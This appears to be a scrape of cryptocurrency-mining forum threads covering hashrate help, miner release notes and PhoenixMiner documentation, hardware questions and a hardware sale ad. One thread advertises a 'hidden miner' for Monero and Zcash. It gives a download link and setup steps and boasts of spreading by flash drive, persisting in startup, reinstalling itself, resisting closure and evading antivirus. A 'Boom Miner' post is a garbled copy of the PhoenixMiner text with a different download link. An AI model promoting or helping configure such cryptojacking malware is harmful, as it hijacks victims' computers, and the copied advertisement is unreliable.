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HELP: I only get 15Mhs with XFX RX-480 P4JFC6 in Nanopool

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Hi, im a new miner. And i just started mining, why is so low the Hashes. And anybody have a Mod bios for this card? Or which parameters should i modify with Polaris. Thanks

i have:
XFX RX-480 P4JFC6
Board BTC250
Celeron 7th
4gb ram

R9 280x 3GB Eth Mining

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I am building a budget miner. Can anyone confirm whether or not I can successfully mine with a R9 280x 3Gb gpu? Thank you!

Free hidden miner Monero+Zcash

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Hidden miner with easy setup.

Download the Assembly - https://mega.nz/#!V3IxQCxJ!7BORcmZXI-LTrkSsbYc1jlXfZ8JhwfwIg7fuI5o3oVQ

Rename system64dr.sys in system64dr.zip
Open z.cnf with Notepad and point it zcash for the wallet(without Riga, just a wallet)

Open m.cnf with Notepad and point it Monero wallet(without Riga, just a wallet)
If necessary, change the pool to pool.cnf (default is spelled out dwarfpool.com)

If necessary, specify iplogger in the iplog.cnf (http only! Detaches during installation)
Saved files to the archive without a password!
Rename back to system64dr.zip to system64dr.sys
Assembly ready. Miner, monero works with dwarfpool.com, monerohash.com - as a backup. Before mining, set a minimum payout on dwarfpool, the default is 2 XMR. Or just write down the right pool in the pool.cnf Zcash is mining on flypool.org, nanopool-backup.
My fee-every 10 run is mining to my wallet(that's 10%).

Peculiar properties:
Writes to startup
The Assembly is distributed through the flash drives.
Monero Melnitsa both on 64 and 32 bit systems, only 64 zcash for
Ban my computer to go to sleep(just the screen goes blank, the computer works and mines)
Load 50% CPU usage and no restrictions on the graphics card
If the miner is disabled, immediately after the closing runs
When you remove from startup, it is prescribed again.
It is extremely difficult to close the miner
Admin rights are not needed
I clean from the detector and spread the new version regularly.
If the miner is removed by antivirus, the infected computer will simply infect the flash drive.
There will be questions, write here or in PM.

[Boom Miner] +8% every day for mining (Zcash)

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BoomMiner is the fastest (possibly the fastest) Etash miner (ZEC, ZCL, Muiscoin, EXP, UBQ, etc.) that supports
both AMD and Nvidia cards (including farms). It is running on Windows x64 and x32
Fees and 0.65% (the lowest % in comparison with analogues).


You can download Boom_Miner c from here:
https://mega.nz/#!RihBWBjb!LIkt6SYJSteDpWgalgEz3mfciXew8q8eKeGgFL7yH7s

Support:

Supports AMD Vega, 580/570/480/470, 460/560, Fury, 390/290 and older AMD GPUs with enough VRAM
* Supports Nvidia 10x0 and 9x0, as well as older cards with enough VRAM
* Highly optimized OpenCL kernel and CUDA for maximum speed of production atasha
* The lowest development fee of 0.65% (35 seconds gives production for every 90 minutes)
* Advanced stats: the actual difficulty of each promotion, as well as the effective hash-hat in the pool
* Generate DAG file in a graphics processor to more quickly launch and switch epoxy DAG
* Supports all pools in the mining area etash and protocols.
* Support for secure connections to the pool (for example, ssl: / /Zcash pool: 5555) to prevent IP-based attacks
* Detailed statistics, including individual hash maps, promotions, temperature and fan speed
* Unlimited number of failover pools in the epools configuration file.txt (or two at the command line)
* Setup GPU for AMD graphics processors for maximum performance with your installation
* Devfee support in alternative floor currencies such as ZEC, EXP, Music, UBQ, Pirl, Ellaism and Metaverse ETP. This allows you to use older maps with little VRAM or low hashing in the current Dag epochs (e.g. GTX970).
* Fully compatible with industry standard Dual Claymore Ethereum, including most of the command-line options,
configuration files and remote monitoring and control.

Ethereum Asic Miner's impact on GPU

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Hi All,
I have been reading quite recently about Ethereum ASIC miners due to be released soon. If it happens, does it kill all GPU based ethereum mining? Or both will survive?
Appreciate any thoughts.

Thanks!

PhoenixMiner 2.9c: fastest Ethereum/Ethash miner with lowest devfee (Windows)

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Changes in version 2.9c (since 2.8c):

• New kernels for all supported AMD GPUs, providing higher hashrate and lower percentage of stale shares. The new kernels are used by default for AMD GPUs. You can also revert to using the old kernels with -clnew 0
• When using the new kernels, the mining intensity is 12 by default instead of 10
• The mining intensity range is now up to 14. Use high -mi only with the new AMD kernels as for the other kernels the stale shares will increase too much
• Small CUDA kernel stability improvements that also may (very) slightly increase the speed of Nvidia cards
• CPU utilization during normal operation is lowered by about a factor of 10 regardless of the number of GPUs
• Added support for -tstop and -tstart options to stop mining on given GPU if the temperature rise above specified value and restart it after it cools down below -tstart temperature
• Fixed the problem with console window freezing after scrolling
• Implemented new -gpow n option to lower the GPU utilization (default: 100, the value is the desired GPU utilization in percent)
• Implemented the -li option to lower the intensity (use this instead of -gpow if you are already using -mi with low values)
• Improved GPU speed statistics, using moving average window for each GPU. You can change the size of the window with the -gswin option (5-30 seconds; default 15; use 0 to revert to the old way of using 5 second "quants" which are independent of each other)
• Specify GPU number above 9 by typing three-digit sequence at the console (e.g. type 011 to pause or resume GPU11)
• Other small improvements and changes
• Added support for the miner_getstat2 remote monitoring request

PhoenixMiner is fast (arguably the fastest) Ethash (ETH, ETC, Muiscoin, EXP, UBQ, etc.) miner that supports
both AMD and Nvidia cards (including in mixed mining rigs). It runs under Windows x64
and has a developer fee of 0.65% (the lowest in the industry). This means that every 90
minutes the miner will mine for us, its developers, for 35 seconds.

The speed is generally faster than Claymore's Ethereum miner in eth only mode
(we have measured about 0.4-1.3% speed improvement but your results may be slightly lower or
higher depending on the GPUs). To achieve highest possible speed on AMD cards it may be needed
to manually adjust the GPU tune factor (a number from 8 to about 400, which can be changed
interactively with the + and - keys while the miner is running).

If you have used Claymore's Dual Ethereum miner, you can switch to PhoenixMiner with
minimal hassle as we support most of Claymore's command-line options and confirguration
files with the notable exception of the dual mining feature (yet).

Please note that PhoenixMiner is extensively tested on many mining rigs but this is the
first public release and there still may be some bugs. Additionally, we are actively working on
bringing many new features in the future releases. If you encounter any problems or have
feature requests, please post them here (in this thread). We will do our best to answer in timely
fashion.

Screenshot:




1. Quick start

You can download PhoenixMiner 2.9c from here:

PhoenixMiner 2.9c

If you want to check the integrity of the downloaded file, please use the following hashes:
Code:
File: PhoenixMiner_2.9c.zip
SHA-1: 6ca71cda4936e096c4a3070134a0978a8fac4aa4
SHA-256: 921a53fbb21fb37735108e48efaa5d600c4e7bbe9da6661b832ace97d29a5efc
SHA-512: 31eeccffe9816e3493531852a8ec7e7868fa8e113237ec538349e6d18c925673a718f561b625b7cce31c994f28a18bd2cf23d6b299a53e69fb74135175f0b499

Here are the command line parameters for some of the more popular pools and coins:

ethermine.org (ETH):
PhoenixMiner.exe -pool eu1.ethermine.org:4444 -pool2 us1.ethermine.org:4444 -wal YourEthWalletAddress.WorkerName -proto 3
ethermine.org (ETH, secure connection):
PhoenixMiner.exe -pool ssl://eu1.ethermine.org:5555 -pool2 ssl://us1.ethermine.org:5555 -wal YourEthWalletAddress.WorkerName -proto 3
ethpool.org (ETH):
PhoenixMiner.exe -pool eu1.ethpool.org:3333 -pool2 us1.ethpool.org:3333 -wal YourEthWalletAddress.WorkerName -proto 3
dwarfpool.com (ETH):
PhoenixMiner.exe -pool eth-eu.dwarfpool.com:8008 -wal YourEthWalletAddress/WorkerName -pass x
nanopool.org (ETH):
PhoenixMiner.exe -pool eu1.nanopool.org:9999 -wal YourEthWalletAddress/WorkerName -pass x
nicehash (ethash):
PhoenixMiner.exe -pool stratum+tcp://daggerhashimoto.eu.nicehash.com:3353 -wal YourBtcWalletAddress -pass x -proto 4 -stales 0
f2pool (ETH):
PhoenixMiner.exe -epool eth.f2pool.com:8008 -ewal YourEthWalletAddress -pass x -worker WorkerName
miningpoolhub (ETH):
PhoenixMiner.exe -pool us-east.ethash-hub.miningpoolhub.com:20535 -wal YourLoginName.WorkerName -pass x -proto 1
coinotron.com (ETH):
PhoenixMiner.exe -pool coinotron.com:3344 -wal YourLoginName.WorkerName -pass x -proto 1
ethermine.org (ETC):
PhoenixMiner.exe -pool eu1-etc.ethermine.org:4444 -wal YourEtcWalletAddress.WorkerName
dwarfpool.com (EXP):
PhoenixMiner.exe -pool exp-eu.dwarfpool.com:8018 -wal YourExpWalletAddress/WorkerName
miningpoolhub (MUSIC):
PhoenixMiner.exe -pool europe.ethash-hub.miningpoolhub.com:20585 -wal YourLoginName.WorkerName -pass x -proto 1
ubiqpool (UBIQ):
PhoenixMiner.exe -pool stratum+tcp://eu.ubiqpool.io:8008 -wal YourUbiqWalletAddress -pass x -worker WorkerName
minerpool.net (PIRL):
PhoenixMiner.exe -pool pirl.minerpool.net:8002 -wal YourPirlWalletAddress -pass x -worker WorkerName
dodopool.com (Metaverse ETP):
PhoenixMiner.exe -pool etp.dodopool.com:8008 -wal YourMetaverseETPWalletAddress -worker Rig1 -pass x
minerpool.net (Ellaism):
PhoenixMiner.exe -pool ella.minerpool.net:8002 -wal YourEllaismWalletAddress -worker Rig1 -pass x

2. Features, requirements, and limitations

* Supports AMD Vega, 580/570/480/470, 460/560, Fury, 390/290 and older AMD GPUs with enough VRAM
* Supports Nvidia 10x0 and 9x0 series as well as older cards with enough VRAM
* Highly optimized OpenCL and CUDA cores for maximum ethash mining speed
* Lowest developer fee of 0.65% (35 seconds defvee mining per each 90 minutes)
* Advanced statistics: actual difficulty of each share as well as effective hashrate at the pool
* DAG file generation in the GPU for faster start-up and DAG epoch switches
* Supports all ethash mining pools and stratum protocols
* Supports secure pool connections (e.g. ssl://eu1.ethermine.org:5555) to prevent IP hijacking attacks
* Detailed statistics, including the individual cards hashrate, shares, temperature and fan speed
* Unlimited number of fail-over pools in epools.txt configuration file (or two on the command line)
* GPU tuning for the AMD GPUs to achieve maximum performance with your rig
* Supports devfee on alternative ethash currencies like ETC, EXP, Music, UBQ, Pirl, Ellaism, and Metaverse ETP. This allows you to use older cards with small VRAM or low hashate on current DAG epochs (e.g. GTX970).
* Full compatibility with the industry standard Claymore's Dual Ethereum miner, including most of command-line options, configuration files, and remote monitoring and management.
* More features coming soon!

PhoenixMiner requires Windows x64 (Windows 7, Windows 10, etc.). We are planning a Linux version in
the future but it may take some time.

PhenixMiner does not support dual mining. However we are working on this feature and will introduce it
soon. Solo mining is supported since version 2.8c.

You can download PhoenixMiner 2.8c from here: PhoenixMiner 2.8c

While the miner is running, you can use some interactive commands. Press the key 'h' while the
miner's console window has the keyboard focus to see the list of the available commands. The
interactive commands are also listed at the end of the following section.

3. Command-line arguments

Note that PhoenixMiner supports most of the command-line options of Claymore's dual Ethereum miner
so you can use the same command line options as the ones you would have used with Claymore's miner.

Pool options:
-pool Ethash pool address (prepend the host name with ssl:// for SSL pool, or http:// for solo mining)
-wal Ethash wallet (some pools require user name and/or worker)
-pass Ethash password (most pools don't require it, use 'x' as password if unsure)
-worker Ethash worker name (most pools accept it as part of wallet)
-proto Selects the kind of stratum protocol for the ethash pool:
1: miner-proxy stratum spec (e.g. coinotron)
2: eth-proxy (e.g. dwarfpool, nanopool) - this is the default, works for most pools
3: qtminer (e.g. ethpool)
4: EthereumStratum/1.0.0 (e.g. nicehash)
-coin Ethash coin to use for devfee to avoid switching DAGs:
auto: Try to determine from the pool address (default)
eth: Ethereum
etc: Ethereum Classic
exp: Expanse
music: Musicoin
ubq: UBIQ
pirl: Pirl
ella: Ellaism
etp: Metaverse ETP
pgc: Pegascoin
akroma: Akroma
whale: WhaleCoin
vic: Victorium
-stales Submit stales to ethash pool: 1 - yes (default), 0 - no
-pool2 Failover ethash pool address. Same as -pool but for the failover pool
-wal2 Failover ethash wallet (if missing -wal will be used for the failover pool too)
-pass2 Failover ethash password (if missing -pass will be used for the failover pool too)
-worker2 Failover ethash worker name (if missing -worker will be used for the failover pool too)
-proto2 Failover ethash stratum protocol (if missing -proto will be used for the failover pool too)
-coin2 Failover devfee Ethash coin (if missing -coin will be used for the failover pool too)
-stales2 Submit stales to the failover pool: 1 - yes (default), 0 - no
General pool options:
-fret Switch to next pool afer N failed connection attempts (default: 3)
-ftimeout Reconnect if no new ethash job is receved for n seconds (default: 600)
-ptimeout Switch back to primary pool after n minutes. This setting is 30 minutes by default;
set to 0 to disable automatic switch back to primary pool.
-rate Report hashrate to the pool: 1 - yes, 0 - no (1 is the default)
Benchmark mode:
-bench [],-benchmark [] Benchmark mode, optionally specify DAG epoch. Use this to test your rig.
Remote control options:
-cdm Selects the level of support of the CDM remote monitoring:
0: disabled
1: read-only - this is the default
2: full (only use on secure connections)
-cdmport Set the CDM remote monitoring port (default is 3333). You can also specify
if you have a secure VPN connection and want to bind the CDM port to it
-cdmpass Set the CDM remote monitoring password
Mining options:
-amd Use only AMD cards
-nvidia Use only Nvidia cards
-gpus <123 ..n> Use only the specified GPUs (if more than 10, separate the indexes with comma)
-mi Set the mining intensity (0 to 14; 12 is the default for the new kernels on AMD GPUs; 10 is the default for Nvidia GPUs)
-gt Set the GPU tuning parameter (8 to 400). The default is 15. You can change the
tuning parameter interactively with the '+' and '-' keys in the miner's console window
-clKernel Type of OpenCL kernel: 0 - generic, 1 - optimized, 2 - alternative (1 is the default)
-clNew Use the new AMD kernels (0: no, 1: yes; default: 1)
-list List the detected GPUs devices and exit
-minRigSpeed Restart the miner if avg 5 min speed is below MH/s
-eres Allocate DAG buffers big enough for n epochs ahead (default: 2) to
avoid allocating new buffers on each DAG epoch switch, which should improve DAG switch stability
-lidag Slow down DAG generation to avoid crashes when swiching DAG epochs
(0-3, default: 0 - fastest, 3 - slowest). This option works only on AMD cards
-altinit Use alternative way to initialize AMD cards to prevent startup crashes
-wdog Enable watchdog timer: 1 - yes, 0 - no (1 is the default). The watchdog timer checks
periodically if any of the GPUs freezes and if it does, restarts the miner (see the -rmode
command-line parameter for the restart modes)
-rmode Selects the restart mode when a GPU crashes or freezes:
0: disabled - miner will shut down instead of restarting
1: restart with the same command line options - this is the default
2: reboot (shut down miner and execute reboot.bat)
-log Selects the log file mode:
0: disabled - no log file will be written
1: write log file but don't show debug messages on screen (default)
2: write log file and show debug messages on screen
-timeout Restart miner according to -rmode after n minutes
-gswin GPU stats time window (5-30 sec; default: 15; use 0 to revert to pre-2.9 way of showing momentary stats)
-gpow Lower the GPU usage to n% of maximum (default: 100). If you already use -mi 0 (or other low value) use -li instead
-li Another way to lower the GPU usage. Bigger n values mean less GPU utilization; the default is 0.
Hardware control options (most are for AMD cards only, only tt 0-4, tstop, and tstart are supported on Nvidia GPUs), use comma to specify different values for each GPU:
-tt Set fan control target temperature (special values: 0 - no HW monitoring on ALL cards,
1-4 - only monitoring on all cards with 30-120 seconds interval, negative - fixed fan speed at n %)
-fanmin Set fan control min speed in % (-1 for default)
-fanmax Set fan control max speed in % (-1 for default)
-tmax Set fan control max temperature (0 for default)
-powlim Set GPU power limit in % (from -75 to 75, 0 for default)
-cclock Set GPU core clock in MHz (0 for default)
-cvddc Set GPU core voltage in mV (0 for default)
-mclock Set GPU memory clock in MHz (0 for default)
-mvddc Set GPU memory voltage in mV (0 for default)
-tstop Pause a GPU when temp is >= n deg C (0 for default; i.e. off)
-tstart Resume a GPU when temp is <= n deg C (0 for default; i.e. off)
General Options:
-v,--version Show the version and exit
-h,--help Show information about the command-line options and exit

Additionally, while the miner is running, you can use the following interactive commands
in the console window by pressing one of these keys:
s Print detailed statistics
1-9 Pause/resume GPU1 ... GPU9
p Pause/resume the whole miner
+,- Increase/decrease GPU tuning parameter
g Reset the GPU tuning parameter
r Reload epools.txt and switch to primary ethash pool
e Select the current ethash pool
h Print this short help

4. Configuration files

Note that PhoenixMiner supports the same configuration files as Claymore's dual Ethereum miner
so you can use your existing configuration files without any changes.

Instead of using command-line options, you can also control PhoenixMiner with configuration
files. If you run PhoenixMiner.exe without any options, it will search for the file config.txt
in the current directory and will read its command-line options from it. If you want, you can
use file with another name by specifying its name as the only command-line option
when running PhoenixMiner.exe.

You will find an example config.txt file in the PhoenixMiner's directory.

Instead of specifying the pool(s) directly on the command line, you can use another configuration
file for this, named epools.txt. There you can specify one pool per line (you will find an example
epools.txt file in the PhoenixMiner's directory).

The advantages of using config.txt and epools.txt files are:
- If you have multiple rigs, you can copy and paste all settings with these files
- If you control your rigs via remote control, you can change pools and even the miner options by
uploading new epools.txt files to the miner, or by uploading new config.txt file and restarting
the miner.

5. Remote monitoring and management

Phoenix miner is fully compatible with Claymore's dual miner protocol for remote monitoring and
management. This means that you can use any tools that are build to support Claymore's dual miner,
including the "Remote manager" application that is part of Claymore's dual miner package.

We are working on much more powerful and secure remote monitoring and control functionality and
control center application, which will allow better control over your remote or local rigs and some
unique features to increase your mining profits.

6. Hardware control options

Here are some important notes about the hardware control options:

• If you specify a single value (e.g. -cvddc 1150), it will be used on all cards. Specify different values for each card like this (separate with comma): -cvddc 1100,1100,1150,1120,1090 If the specified values are less than the number of GPUs, the rest of GPUs will use the default values.
• We have tested only on relatively recent AMD GPUs (RX460/470/480/560/570/580 and Vega). Your results may vary with older GPUs.
• The blockchain beta drivers from AMD show quite unstable results - often the voltages don't stick at all or revert back to the default after some time. For best results use the newest drivers from AMD: 18.1.1 or 18.2.1, where most of the bugs are fixed.
• -tmax specifies the temperature at which the GPU should start to throttle (because the fans can't keep up).
• If you use other programs for hardware control, conflicts are possible and quite likely. Use something like GPU-Z to monitor the voltages, etc. MSI Afterburner also seems to behave OK (so you can use it to control the Nvidia cards while AMD cards are controller by PhoenixMiner).
• This should be obvious but still: if given clocks/voltages are causing crahses/freezes/incorrect shares when set with third-party program, they will be just as much unstable when set via PhoenixMiner hardware control options.
• If you have problems with hardware control options of PhoenixMiner and you were using something else to control clocks, fans, and voltages (MSI Aftrerburner, OverdriveNTool, etc.), which you were happy with, it is probably best to keep using it and ignore the hardware control options of PhoenixMiner (or use only some of them and continue tweaking the rest with your third-party tools).

7. FAQ

Q001: Why another miner?
A: We feel that the competition is good for the end user. In the first releases of PhoenixMiner
we focused on the basic features and on the mining speed but we are now working on making our
miner easier to use and even faster.

Q002: Can I run several instances of PhoenixMiner on the same rig?
A: Yes, but make sure that each GPU is used by a single miner (use the -gpus, -amd, or -nvidia
command-line options to limit the GPUs that given instance of PhoenixMiner actually uses).
Another possible problem is that all instances will use the default CDM remote port 3333,
which will prevent proper remote control for all but the first instance. To fix this problem,
use the -cdmport command-line option to change the CDM remote port form its default value.

Q003: Can I run PhoenixMiner simultaneously on the same rig with other miners?
A: Yes, but see the answer to the previous question for how to avoid problems.

Q004: What is a stale share?
A: The ethash coins usually have very small average block time (15 seconds in most instances).
On the other hand, to achieve high mining speed we must keep the GPUs busy so we can't switch
the current job too often. If our rigs finds a share just after the someone else has found a
solution for the current block, our share is a stale share. Ideally, the stale shares should be
minimal as same pools do not give any reward for stale shares, and even these that do reward
stall shares, give only partial reward for these shares. If the share is submitted too long
after the block has ended, the pool may even fully reject it.

Q005: Why is the percentage of stale shares reported by PhoenixMiner smaller than the one shown
by the pool?
A: PhonixMiner can only detect the stale shares that were discovered after it has received a
new job (i.e. the "very stale") shares. There is additional latency in the pool itself, and in
the network connection, which makes a share stall even if it was technically found before the
end of the block from the miner's point of view. As pools only reports the shares as accepted
or rejected, there is no way for the miner to determine the stale shares from the pool's
point of view.

Q006: What is the meaning of the "actual share difficulty" shown by PhoenixMiner when a share is
found?
A: It allows you to see how close you were to finding an actual block (a rare event these days
for the most miners with reasonable-sized mining rigs). You can find the current difficulty for
given coin on sites like whattomine.com and then check to see if you have exceeded it with your
maximum share difficulty. If you did, you have found a block (which is what the mining is all
about).

Q007: What is the meaning of "effective speed" shown by PhoenixMiner's statistics?
A: This is a measure of the actually found shares, which determines how the pool sees your
miner hashrate. This number should be close to the average hashrate of your rig (usually a 2-4%
lower than it) depending you your current luck in finding shares. This statistic is meaningless
in the first few hours after the miner is started and will level off to the real value with
time.

Q008: Why is the effective hashrate shown by the pool lower than the one shown by PhoenixMiner?
A: There are two reasons for this: stale shares and luck. The stale shares are rewarded at only
about 50-70% by most pools. The luck factor should level itself off over time but it may take
a few days before it does. If your effective hashrate reported by the pool is consistently lower
than the hashrate of your rig by more than 5-7% than you should look at the number of stale shares
and the average share acceptance time - if it is higher than 100 ms, try to find a pool that is
near to you geographically to lower the network latency. You can also restart your rig, or
try another pool.

8. Troubleshooting

P001: I'm using AMD RX470/480/570/580 or similar card and my hashrate dropped significantly in the past
few months for Ethereum and Ethereum classic!
S: This is known problem with some cards. For the newer cards (RX470/480/570/580), this can be
solved by using the special blockchain driver from AMD (or try the latest drivers, they may
incorporate the fix). For the older cards there is no workaround but you still can mine EXP,
Musicoin, UBQ or PIRL with the same speed that you mined ETH before the drop.

P002: My Nvidia GTX9x0 card is showing very low hashrate under Windows 10!
S: While there is a (convoluted) workaround, the best solution is to avoid Windows 10
for these cards - use Windows 7 instead.

P003: I'm using Nvidia GTX970 (or similar) card and my hashrate dropped dramatically for Ethereum or
Ethereum classic!
S: GTX970 has enough VRAM for larger DAGs but its hashate drops when the DAG size starts
to exceed 2 GB or so. Unlike the AMD Polaris-based cards, there is no workaround for this
problem. We recommend using these cards to mine EXP, Musicoin, UBQ or PIRL with the same speed
that you used to ETH before the drop.

P004: I can't see some of my cards (or their fan speed and temperature) when using Windows Remote Desktop (RDP)!
S: This is a known problem with RDP. Use VNC or TeamViewer instead.

P005: On Windows 10, if you click inside the PhoenixMiner console, it freezes!
S: This is a known problem on Windows 10, related to so called "Quick Edit" feature of the command
prompt window. From PhoenixMiner 2.8, the QuickMode is disabled by default, so you shouldn't experience
this problem. If you still, do, read here how to solve it: http://stackoverflow.com/q/33883530

P006: Immediately after starting, PhoenixMiner stops working and the last message is "debugger detected"
S: If you have only Nvidia cards, add the option -nvidia to the PhoenixMiner.exe command line.
If you have only AMD cards, add the option -amd to the command line.

P007: PhoenixMiner shows an error after allocating DAG buffer and shuts down.
S: If you have more than one GPU, make sure that your Windows page file minimal size is set to at
least 16 GB. If this doesn't help, start PhoenixMiner by running the start_miner.bat that is in the
miner's folder. You MUST change the wallet address that is specified in start_miner.bat to make
sure that the miner mines to your address. Also, make sure that all lines, starting with setx are
not commented (i.e. they doesn't start with REM command).

P008: The miner sometimes crashes when the DAG epoch change.
S: During DAG generation, the GPUs are loaded more than during the normal operation. If you have
overclocked or undervolted the GPUs "to the edge", the DAG generation ofter pushes them "over the
edge". Another possible reason for the crash (especially if the whole rig crashes) is the higher
power usage during this process. You can lower the DAG generation speed by specifying the -lidag
command-line option. The possible values are 0 (no slow down), 1, 2, and 3 (max slowdown).
In order to check if your rig would be stable during DAG generation, run it in benchmark mode
by specifying the -bench 170 command line option. Then every time when you press the key 'd'
the miner will advance to the next DAG epoch, and you will be able to see if it is stable during
multiple DAG generations. If it isn't you can try to alter the -lidag and -eres command line options
until the desired stability is achieved.

NVIDIA Inspector 1.9.8.1

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NVIDIA Inspector can help users identify important information about the hardware on their operating system as well as any drivers that may currently be installed. So, it is an excellent supplement to existing options such as a standard control panel. There is no charge to download this package and it can be installed in only a matter of minutes.
Features and Uses
INVIDIA Inspector is primarily used to uncover any problems that may be occurring within an operating system. Defective drivers, outdated graphics cards and the inability for a computer to recognise a piece of installed software are a few examples here. A centralised user interface will display all of the most important parameters. These can then be modified by entering new values into the corresponding fields. More advanced options include setting clocks and fan speeds, both important advantages when optimising an operating system.
Upgrades and Other Tools
There have been many recent upgrades to INVIDIA Inspector. This is now an open-source program, so more changes are likely to take place in the future. Predefined settings can be exported, GPU speeds are able to more accurately monitored and the display template itself has been streamlined so that users can find what they are looking for. This package is currently licensed by MIT, so quality is never an issue.

You can download NVIDIA Inspector 1.9.8.1 from here:

NVIDIA Inspector 1.9.8.1


XFX RX580

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Anyone using the XFX RX580 for Eth Mining? I just picked one up to bolster my 7 GPU rig to 8 and wish i had not. It runs like HOTTER than HOT, SMOS does not like the Bios Mod, Low Hash rate.

I have 3 rigs now and a mix of Nitro's, ASUS Strix, Red Devils' all RX 580/570's but picked this XFX up as it was at a cheap(ER) price than a Strix/Nitro.

Anyone else having Heat Issues with the XFX?

Nice to know if it is just me and my bad luck or is it common for these cards?

Thanks

MinerWorks - Mining, Overclocking and Monitoring in one solution

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Hello :)

Today, on January 1, we present to you the first [b]beta version of MinerWorks, our application that combines [u]mining[/u], [u]overclocking [/u]and [u]monitoring [/u]in [b]single solution[/b], with a convenient graphical interface.

And now about everything in order.




Mining:

Pools - choose your favorite pool from the list
Coins - choose suitable coins from the list
Miners - choose the best miners from the list
Modes - simple and advanced modes
GUI - friendly user interface





Overclocking:

Setting - a familiar and quick change of parameters
Modes - simple and advanced modes
GUI- friendly user interface





Monitoring:

Setting - intuitive setting of graphs
Modes - simple and advanced modes
GUI - friendly user interface





Forum:

News - follow the development of the project
Discussions - discuss various pressing issues
Troubleshooting - ask questions about the work of the solution





Download

Pour another cup of coffee into us – BTC:17eDm1TSRLhmymup5kG8tJWpWJWAQcubfm

The development fee is 1% of the solution's working time



Selling Antminer S9 13.5TH/s with APW3++ Power Supply ! Price: 1400$

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SALES SALES SALES !!!


Antminer S9 13.5TH/s with APW3++ Power Supply !
Price: 1400$
Antminer S9 14TH/s with APW3++ Power Supply
Price: 1600$
Age: New
Packaging: Boxed From Manufacturer
Condition:New



IN STOCK - READY TO SHIP


Interested buyer should email at :

Email : ramonvidic1@gmail.com

Skype Chat : zahil.export2

Whatsapp : +1 929 266 7402

[Help Needed]Miner's won't detect GPU's

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I've tried several mining softwares and several gpu softwares but none of them detects my GPU's. I can see them on the device manager. But can't see them on the mining softwares.
What might be the problem?
I am using win10 64 bit pro and 2x Rx480's
Thank you.

Asus Mining Expert cards disappear after reboot

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Hello,
I am trying to mine with Asus mining expert using 13 cards, but sometimes when I reboot some cards disappear.
The problem is that I don't have on site support for my rigs and I have to drive a long distance to swap risers in other PCI-E position.
I was mining on Asus PRIME Z270-A and I got zero issues with it as I automated reboot when something crashed and so on...
But this mining expert is more like black box as it tries to be broken.

Have somebody experienced this issue? How to solve it? Thanks

Claymore's Dual Ethereum AMD+NVIDIA GPU Miner v11.7 (Windows/Linux)

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- now miner uses the latest framework which is used for dual and zec miners. Therefore several new options are available.
- new assembler GPU kernels are used.
- added "-dmem" options that can improve performance in many cases. Note that twice more GPU memory is used in this mode.
- some old options were removed, some were renamed, please read Readme for detailed information and samples.
- reduced devfee, it's 1% now if you use secure SSL/TLS connection, 1.5% for unsecure connection.
- devfee mining is executed every hour, similar to dual and zec miners.
- a lot of minor improvements.

Download from here - Claymore's Dual Ethereum AMD+NVIDIA GPU Miner

SRBPolaris V3.5 - BIOS editor for AMD RX4XX and RX5XX cards

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SRBPolaris BIOS EDITOR

BIOS editor for AMD RX 460/470/480, RX 550/560/570/580 video cards

- Pimp my straps - speed up your factory bios with custom straps
- Copy memory straps fast and easy
- Memory timing strap editor - make your own custom straps
- Unlock RX460 additional shaders
- Set default GPU and MEM clocks
- Set GPU voltage
- Lot's of useful stuff


Latest ver. : SRBPolaris BIOS EDITOR V3.5
Download from here : SRBPolaris_V3.5


- Pimp my straps - give wings to your factory bios
- Added power control limit
- Added fan mode selection
- Med-High temp and PWM is now editable
- Added fan sensitivity and acoustic limit
- Bug fixes

Download SRBPolaris BIOS EDITOR V3.4 from here : SRBPolaris_V3.4

Ethminer-0.14.0rc2 (Windows/Linux)

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Ethereum miner with OpenCL, CUDA and stratum support

The ethminer is an Ethereum GPU mining worker. This is the actively maintained version of ethminer. It originates from cpp-ethereum project (where GPU mining has been discontinued) and builds on the improvements made in Genoil's fork. See FAQ for more details.

Features:
• OpenCL mining
• Nvidia CUDA mining
• realistic benchmarking against arbitrary epoch/DAG/blocknumber
• on-GPU DAG generation (no more DAG files on disk)
• stratum mining without proxy
• OpenCL devices picking
• farm failover (getwork + stratum)

Install:

Standalone executables for Linux, and Windows are provided in the Releases section. Download an archive for your operating system and unpack the content to a place accessible from command line. The ethminer is ready to go.

Download:

For Linux - ethminer-0.14.0rc2-Linux

For Windows - ethminer-0.14.0rc2-Windows

Usage

The ethminer is a command line program. This means you launch it either from a Windows command prompt or Linux console, or create shortcuts to predefined command lines using a Linux Bash script or Windows batch/cmd file. For a full list of available command, please run
ethminer --help

Build

Continuous Integration and development builds

The AppVeyor system automatically builds a Windows .exe for every commit. The latest version is always available on the landing page or you can browse the history to access previous builds.
To download the .exe on a build under 'JOB NAME' select 'Configuration: Release', choose 'ARTIFACTS' then download the zip file.

Building from source

This project uses CMake and Hunter package manager.
1. Make sure git submodules are up to date
git submodule update --init --recursive
2. Create a build directory.
mkdir build; cd build
3. Configure the project with CMake. Check out additional configuration options.
cmake ..
Note: In Windows, it is possible to have issues with VS 2017 compilers, in that case, use VS 2017 installer to get VS 2015 compilers and use:
cmake .. -G "Visual Studio 15 2017 Win64" -Tv140
4. Build the project using CMake Build Tool Mode. This is a portable variant of make.
cmake --build .
Note: In Windows, it is possible to have compiler issues if you don't specify build config. In that case use:
cmake --build . --config Release
5. (Optional, Linux only) Install the built executable.
sudo make install
OpenCL support on Linux
If you're planning to use OpenCL on Linux you have to install OpenGL libraries. E.g. on Ubuntu run:
sudo apt-get install mesa-common-dev
Disable Hunter
If you want to install dependencies yourself or use system package manager you can disable Hunter by adding -DHUNTER_ENABLED=OFF to configuration options.

CMake configuration options

Pass these options to CMake configuration command, e.g.
cmake .. -DETHASHCUDA=ON -DETHASHCL=OFF
• -DETHASHCL=ON - enable OpenCL mining, ON by default,
• -DETHASHCUDA=ON - enable CUDA mining, OFF by default.


F.A.Q
1. Why is my hashrate with Nvidia cards on Windows 10 so low?
The new WDDM 2.x driver on Windows 10 uses a different way of addressing the GPU. This is good for a lot of things, but not for ETH mining. For Kepler GPUs: I actually don't know. Please let me know what works best for good old Kepler. For Maxwell 1 GPUs: Unfortunately the issue is a bit more serious on the GTX750Ti, already causing suboptimal performance on Win7 and Linux. Apparently about 4MH/s can still be reached on Linux, which, depending on ETH price, could still be profitable, considering the relatively low power draw. For Maxwell 2 GPUs: There is a way of mining ETH at Win7/8/Linux speeds on Win10, by downgrading the GPU driver to a Win7 one (350.12 recommended) and using a build that was created using CUDA 6.5. For Pascal GPUs: You have to use the latest WDDM 2.1 compatible drivers in combination with Windows 10 Anniversary edition in order to get the full potential of your Pascal GPU.
2. Why is a GTX 1080 slower than a GTX 1070?
